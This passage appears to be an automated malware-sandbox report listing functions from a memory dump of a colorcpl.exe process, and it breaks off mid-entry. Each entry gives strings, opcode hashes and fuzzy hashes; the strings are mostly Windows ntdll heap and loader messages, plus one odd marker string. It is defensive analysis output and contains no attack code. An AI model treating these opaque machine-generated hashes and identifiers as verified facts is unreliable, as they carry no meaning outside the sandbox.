                                                                                                    • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!$@$@$@$@$@$Control Panel\Desktop$InstallLanguageFallback$LanguageConfiguration$LanguageConfigurationPending$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                                                    • API String ID: 0-1325123933
                                                                                                    • Opcode ID: d2e7d42d81cab582a5698391366c66602756b3d108aabd76e2265538ac15b6e1
                                                                                                    • Instruction ID: 50ce636c0ddef9cb9054505f316e9bbf7c58d4a941c578405be85f3ae743bdb8
                                                                                                    • Opcode Fuzzy Hash: d2e7d42d81cab582a5698391366c66602756b3d108aabd76e2265538ac15b6e1
                                                                                                    • Instruction Fuzzy Hash: 577239759083819BD311CF29C850BABB7E9BF88714FC04A2EF9D5D7250EB34D8498B96
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6DF99B Relevance: 10.2, Strings: 8, Instructions: 189COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
                                                                                                    • API String ID: 0-2224505338
                                                                                                    • Opcode ID: 74d53fa2ec2a2c7872958d48c4d43e6b80a9abf2486745cae6cf9db6557c7ae7
                                                                                                    • Instruction ID: 6c4530329abfe68f0aec782544ac847c9005760f7c697d1b1272a022bd06c4a5
                                                                                                    • Opcode Fuzzy Hash: 74d53fa2ec2a2c7872958d48c4d43e6b80a9abf2486745cae6cf9db6557c7ae7
                                                                                                    • Instruction Fuzzy Hash: B751AE36A12296EFC711CF94C8A4E9AB7E5FF0AB24FD88725E4419F251C670ACC4CE14
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6B9C32 Relevance: 6.8, Strings: 5, Instructions: 542COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: @$AVRF: Verifier .dlls must not have thread locals$KnownDllPath$L$\KnownDlls32
                                                                                                    • API String ID: 0-3127649145
                                                                                                    • Opcode ID: 7398ded717a75cf6bf430eb36ad90eeb51f0c9a927fd86045c4970ee9d7b0837
                                                                                                    • Instruction ID: d6faad4d862cac2c20dcb27abc37edbc968ea9e88c07715424e22669c59f88e7
                                                                                                    • Opcode Fuzzy Hash: 7398ded717a75cf6bf430eb36ad90eeb51f0c9a927fd86045c4970ee9d7b0837
                                                                                                    • Instruction Fuzzy Hash: 8E326A74E017199BDB61CF25CC88B9AB7F9FF48304F9046EAD509A7250EB71AA84CF44
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E649950 Relevance: 6.7, Strings: 5, Instructions: 462COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: $ $Internal error check failed$Status != STATUS_SXS_SECTION_NOT_FOUND$minkernel\ntdll\sxsisol.cpp
                                                                                                    • API String ID: 0-3393094623
                                                                                                    • Opcode ID: af1ff19cd8b47a5c654dc63671f7c2c2942d666374ac1c92f47ff4f950a63443
                                                                                                    • Instruction ID: f8e9d36a766570df53da6a6966a72276233961cd186f8a3cf9e79368501e6b4d
                                                                                                    • Opcode Fuzzy Hash: af1ff19cd8b47a5c654dc63671f7c2c2942d666374ac1c92f47ff4f950a63443
                                                                                                    • Instruction Fuzzy Hash: 30028075948382CFD320CF65C090B9BB7E6BF89754FA58A1EE898C7250E774D844CB92
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6DFD78 Relevance: 6.4, Strings: 5, Instructions: 190COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                                                                    • API String ID: 0-3492000579
                                                                                                    • Opcode ID: 8d2ba58a9fc4a6b8d96af14d13ef10176dc0bc2ff332e5f5c4657a2bd4210efa
                                                                                                    • Instruction ID: e66b4ed93a96d63fb0b2e9a747e4dd1f120d7031e7d992c86c068e7922c3bb45
                                                                                                    • Opcode Fuzzy Hash: 8d2ba58a9fc4a6b8d96af14d13ef10176dc0bc2ff332e5f5c4657a2bd4210efa
                                                                                                    • Instruction Fuzzy Hash: E771DF35902296DFCB01CFA8C490AADFBF6FF4A304FC48659E4859B792C735A984CB54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E65DB00 Relevance: 6.4, Strings: 5, Instructions: 133COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                                                    • API String ID: 0-3224558752
                                                                                                    • Opcode ID: 4d5e6a94eb59edcbfb4042c17ab89ac6bfdbee509295c2118f6d2743304e19d6
                                                                                                    • Instruction ID: f7e55367e80a3ace4b79093668dd00621a22bebf28c6a9629cdb0b10984bd19e
                                                                                                    • Opcode Fuzzy Hash: 4d5e6a94eb59edcbfb4042c17ab89ac6bfdbee509295c2118f6d2743304e19d6
                                                                                                    • Instruction Fuzzy Hash: 0B414871A11792DFD702CF24C894BAAB7B6EF06364F908769D4024B791CB78A8C1DB91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6BFD2A Relevance: 6.4, Strings: 5, Instructions: 115COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Item:$ Language:$ Name:$SR - $Type:
                                                                                                    • API String ID: 0-3082644519
                                                                                                    • Opcode ID: 5afd4b03b0727628de34a4bdb757a054f0caaf6836ed3bce18b4579b0d125c02
                                                                                                    • Instruction ID: 6d8252f17c61398e03d74b5eea5e52b481e520b407b2a7d3789d69a5875540c0
                                                                                                    • Opcode Fuzzy Hash: 5afd4b03b0727628de34a4bdb757a054f0caaf6836ed3bce18b4579b0d125c02
                                                                                                    • Instruction Fuzzy Hash: 7441B176A01268ABCB20CB65CC48BDAB7BCAF46300F8446D5A449A7250DF35AE84CF51
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E65D9D0 Relevance: 6.4, Strings: 5, Instructions: 108COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: %ld leaks detected.$HEAP: $HEAP[%wZ]: $Inspecting leaks at process shutdown ...$No leaks detected.
                                                                                                    • API String ID: 0-1155200129
                                                                                                    • Opcode ID: c5cc0878f3ba7f86d5062062c11e0779c4fe62fc94a69bd4106b44e768c04384
                                                                                                    • Instruction ID: abcf3ee734d314a0444a845c380e63e6643ce65002425522f7265e517128d4ea
                                                                                                    • Opcode Fuzzy Hash: c5cc0878f3ba7f86d5062062c11e0779c4fe62fc94a69bd4106b44e768c04384
                                                                                                    • Instruction Fuzzy Hash: 6C31B375612682DFD6119B64CA84F2273E9EF46F60FC28B26E4014B752DB34ACC1DF04
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E65DBA0 Relevance: 6.3, Strings: 5, Instructions: 84COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                                                                    • API String ID: 0-1222099010
                                                                                                    • Opcode ID: 63f9551a89437cbed5dc165c25da7546f6d9008f7d35d8fc822709ff9ff1ad36
                                                                                                    • Instruction ID: 8fe82758c541c1a4429dfa9ceea96f0de85839f71db0ed2c84a1c3d5e65bac1f
                                                                                                    • Opcode Fuzzy Hash: 63f9551a89437cbed5dc165c25da7546f6d9008f7d35d8fc822709ff9ff1ad36
                                                                                                    • Instruction Fuzzy Hash: BD3196786057D1DFD312CB24C804B9A7BE9EF02790F804794E4424B792C7B8B8C0CB11
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6276B2 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                                                    • API String ID: 0-3061284088
                                                                                                    • Opcode ID: f408124e906f9d35ac75b54439083c53bed2b43346f6c1a54c1f48f842079f89
                                                                                                    • Instruction ID: c20341883408e78bb5e51e89fbe3a22f0c8eeb04b6b5367746cbf5d0a13f7451
                                                                                                    • Opcode Fuzzy Hash: f408124e906f9d35ac75b54439083c53bed2b43346f6c1a54c1f48f842079f89
                                                                                                    • Instruction Fuzzy Hash: ED014C3A4052E1DED33A9714D818F927BE4DB47770FD44329E0024B751CBE8BC80CA24
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E63BEC0 Relevance: 5.7, Strings: 4, Instructions: 694COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: $$.mui$.mun$SystemResources\
                                                                                                    • API String ID: 0-3047833772
                                                                                                    • Opcode ID: 2d76ab2d624bc89371c62870fd286828a92a51b8f04bc2660aef1a3df612f693
                                                                                                    • Instruction ID: 97bc484c42d182a629018dcd5df82eaa82b137ac7ab3852d8e4932bbfbc16945
                                                                                                    • Opcode Fuzzy Hash: 2d76ab2d624bc89371c62870fd286828a92a51b8f04bc2660aef1a3df612f693
                                                                                                    • Instruction Fuzzy Hash: C7623A76A003698FCB24CF55CC40BD9B7B9BB0A311F9446EAE40DA7A54D7319E84CF52
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E643D40 Relevance: 5.4, Strings: 3, Instructions: 1603COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                    • API String ID: 0-3178619729
                                                                                                    • Opcode ID: af2d23da7195befad4445e6878cd34a41339eff434baf8bf685f042a5eefa739
                                                                                                    • Instruction ID: f0b516f21badffb43c5e2b693f866954623213dcafcd426127afeac46ffea5af
                                                                                                    • Opcode Fuzzy Hash: af2d23da7195befad4445e6878cd34a41339eff434baf8bf685f042a5eefa739
                                                                                                    • Instruction Fuzzy Hash: 87E2C174A00255CFDB15CF69C491BADBBF2FF4A304FA482A9D849AB385D730A845CF90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E62F626 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                                    • API String ID: 2994545307-2586055223
                                                                                                    • Opcode ID: 0c45c94be7ceca3431ec96d668cdb6ac89f88cb1368c422582ec0270237a52c0
                                                                                                    • Instruction ID: 01ffb20394dcbc1b5487c50cf313ab80ab64cb0843ebb81e068b879d06a8d19e
                                                                                                    • Opcode Fuzzy Hash: 0c45c94be7ceca3431ec96d668cdb6ac89f88cb1368c422582ec0270237a52c0
                                                                                                    • Instruction Fuzzy Hash: D8613176206382AFE311CB24CC54F57B7E9EF81B10F840B29F9959B291C734E881CB62
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6B19EE Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: .txt$.txt2$BoG_ *90.0&!! Yy>$stxt371
                                                                                                    • API String ID: 0-1880532218
                                                                                                    • Opcode ID: f42c35c776c17d1761f9273ef398cb49336c28f0390dcfd98733cc70a6a63081
                                                                                                    • Instruction ID: 17d1e6f22a8085fd389791d23c074a608756640556520e2543ff16c35d930efa
                                                                                                    • Opcode Fuzzy Hash: f42c35c776c17d1761f9273ef398cb49336c28f0390dcfd98733cc70a6a63081
                                                                                                    • Instruction Fuzzy Hash: C5212136F01240FBC701CB588C51BAAB3F9AF85704F8A426AE845EB341E738EA01C344
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6DFCDF Relevance: 5.1, Strings: 4, Instructions: 54COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: HEAP: $HEAP[%wZ]: $May not destroy the process heap at %p$RtlDestroyHeap
                                                                                                    • API String ID: 0-4256168463
                                                                                                    • Opcode ID: 43e2732c3f94691d49cb57cfffad7ebcf8323f77c3ea48b2d85b240b144256b6
                                                                                                    • Instruction ID: 12072fe3a5a040c722691099fad280b0ee6cb9291b281386247f99233513c414
                                                                                                    • Opcode Fuzzy Hash: 43e2732c3f94691d49cb57cfffad7ebcf8323f77c3ea48b2d85b240b144256b6
                                                                                                    • Instruction Fuzzy Hash: A901C036512751DBCB11DF64C810B8673EAFF03750FC04B65E4829B280DB34ED89CA68
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E641F92 Relevance: 4.3, Strings: 3, Instructions: 563COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                    • API String ID: 0-3178619729
                                                                                                    • Opcode ID: d20a99c12f7496c425281ebf43afee9a77f818e9e659f1702b9f21640220f1de
                                                                                                    • Instruction ID: b1afa92f9b474ff1f6d9a61a9bdf70959829f9ca497904c9a4b0362a7db6e2ed
                                                                                                    • Opcode Fuzzy Hash: d20a99c12f7496c425281ebf43afee9a77f818e9e659f1702b9f21640220f1de
                                                                                                    • Instruction Fuzzy Hash: B422E270A00696DFDB05CF24C4A4B7ABBF6FF06B04FA48659E4558B381D775E881CB60
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6C3A78 Relevance: 4.1, Strings: 3, Instructions: 398COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                                                                                    • API String ID: 0-1168191160
                                                                                                    • Opcode ID: c3ada28e05765860cc9ee3f6e87bfab3ff161049f60d2e5210bf55daed91fa6c
                                                                                                    • Instruction ID: 387538be35cbe1e06e66af80850defddd6d795cc1baa56cf6cf0ae00ae2e52d5
                                                                                                    • Opcode Fuzzy Hash: c3ada28e05765860cc9ee3f6e87bfab3ff161049f60d2e5210bf55daed91fa6c
                                                                                                    • Instruction Fuzzy Hash: EAF1B4B5A412698BCB20CF15CC90BDDB3B6EF59304F9586EAD609A7240E7319F81CF58
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E63BAA0 Relevance: 4.1, Strings: 3, Instructions: 361COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • 'LDR: %s(), invalid image format of MUI file , xrefs: 1E693AB4
                                                                                                    • {, xrefs: 1E693ABD
                                                                                                    • LdrpLoadResourceFromAlternativeModule, xrefs: 1E693AAF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 'LDR: %s(), invalid image format of MUI file $LdrpLoadResourceFromAlternativeModule${
                                                                                                    • API String ID: 0-1697150599
                                                                                                    • Opcode ID: 2fe65eadcd271fd639b9898e3531f88313144dc128a3fce416d5a08ee5871bc4
                                                                                                    • Instruction ID: 6884af9337c5d37c22bd5b5ca889dc9504818701ad444bc666e80d187df47493
                                                                                                    • Opcode Fuzzy Hash: 2fe65eadcd271fd639b9898e3531f88313144dc128a3fce416d5a08ee5871bc4
                                                                                                    • Instruction Fuzzy Hash: 22E1AA346083828FD314CF15C590B6BB7E2AF85746FA18A2DF88A8B354DB75DD45CB82
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E63B6C0 Relevance: 4.1, Strings: 3, Instructions: 303COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                                                                    • API String ID: 0-1145731471
                                                                                                    • Opcode ID: 0bca75221293d0390f273995a2f216d362d80fccb95041a1e35fd252520e3fc8
                                                                                                    • Instruction ID: 5520cab278f83d62cc6c5d81d3ea06de7a4f9f92e8936816cfe0ae08791ece1e
                                                                                                    • Opcode Fuzzy Hash: 0bca75221293d0390f273995a2f216d362d80fccb95041a1e35fd252520e3fc8
                                                                                                    • Instruction Fuzzy Hash: 09B1EC75E556458FCB15CF69CA90B9DB7B6EF85320FA54A29E816EB780D334EC40CB00
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6B368C Relevance: 4.0, Strings: 3, Instructions: 292COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                                                    • API String ID: 0-2391371766
                                                                                                    • Opcode ID: 01f931c3bfedb244fde47c9f731da309e122917501cbd964745c9234de2b0986
                                                                                                    • Instruction ID: 214258f06ccf7ddb9f62b601e3e7b4b0b7f5a0bec6bfeb518273172871cfd61b
                                                                                                    • Opcode Fuzzy Hash: 01f931c3bfedb244fde47c9f731da309e122917501cbd964745c9234de2b0986
                                                                                                    • Instruction Fuzzy Hash: 6EB1B0B5B45392AFE311DF55C890F5BB7E8FB49710F910A2AFA409B250D7B0E804CB96
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6D3B60 Relevance: 4.0, Strings: 3, Instructions: 280COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: @$@$\Registry\Machine\System\CurrentControlSet\Control\MUI\UILanguages
                                                                                                    • API String ID: 0-1146358195
                                                                                                    • Opcode ID: 48a8cae36c01eacdbb0894482ffe6fae30705b6067e150083a634196391f1192
                                                                                                    • Instruction ID: 7c29d4eadf1b2de5323d6884f560673e3db886cabe59cba2b85111e9cc8cca95
                                                                                                    • Opcode Fuzzy Hash: 48a8cae36c01eacdbb0894482ffe6fae30705b6067e150083a634196391f1192
                                                                                                    • Instruction Fuzzy Hash: A1A15B75A493929BD311CF24C880B5BBBE9BF88B54F810A2DF9D497250D730ED08CB96
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E62F910 Relevance: 4.0, Strings: 3, Instructions: 263COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                    • API String ID: 0-3610490719
                                                                                                    • Opcode ID: 8d5ad398edee7007d74aed62e042d8e80c4b1ff4c5c5c4320356a0bcf0a40f86
                                                                                                    • Instruction ID: acf494bd974db6cd9e5b2bd4fdd19ecfdedebe61e4a6a89cbcec54f52e6ac448
                                                                                                    • Opcode Fuzzy Hash: 8d5ad398edee7007d74aed62e042d8e80c4b1ff4c5c5c4320356a0bcf0a40f86
                                                                                                    • Instruction Fuzzy Hash: EA91F175A11782DFD315CB25CC94B6AB7A6BF46710FC40B69F841AB280DB34A880CF96
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6C36EE Relevance: 4.0, Strings: 3, Instructions: 236COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                                                                    • API String ID: 0-318774311
                                                                                                    • Opcode ID: 9d66194048338131d5455ed9adfe9ccd41992a389884cf0f41a87b68abce79f3
                                                                                                    • Instruction ID: da829c35af46ab7ca619cbe7669c8e867c55aad6ab8be88cdbc1ec8583f5ff83
                                                                                                    • Opcode Fuzzy Hash: 9d66194048338131d5455ed9adfe9ccd41992a389884cf0f41a87b68abce79f3
                                                                                                    • Instruction Fuzzy Hash: 4E819E75649381AFD311CB15C840B5ABBE9FF85B50F800AADF9809B390E774EA44CB66
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E70B73C Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 1E70B82A
                                                                                                    • GlobalizationUserSettings, xrefs: 1E70B834
                                                                                                    • TargetNtPath, xrefs: 1E70B82F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                                                    • API String ID: 0-505981995
                                                                                                    • Opcode ID: a7e74ea319e97c2e45c8d00518ebccd6e961bcb8c3125c2751de3e4744a3f010
                                                                                                    • Instruction ID: cdc4798d6fa390c757c0dd67871fa4bcec76d950763191e34fbfcb8d01b0f6ee
                                                                                                    • Opcode Fuzzy Hash: a7e74ea319e97c2e45c8d00518ebccd6e961bcb8c3125c2751de3e4744a3f010
                                                                                                    • Instruction Fuzzy Hash: 67617072951269EBEB21DF54CC88BE9B7F8AF05710F4102E9E509A7260C734AF80CF94
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E659803 Relevance: 3.9, Strings: 3, Instructions: 179COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
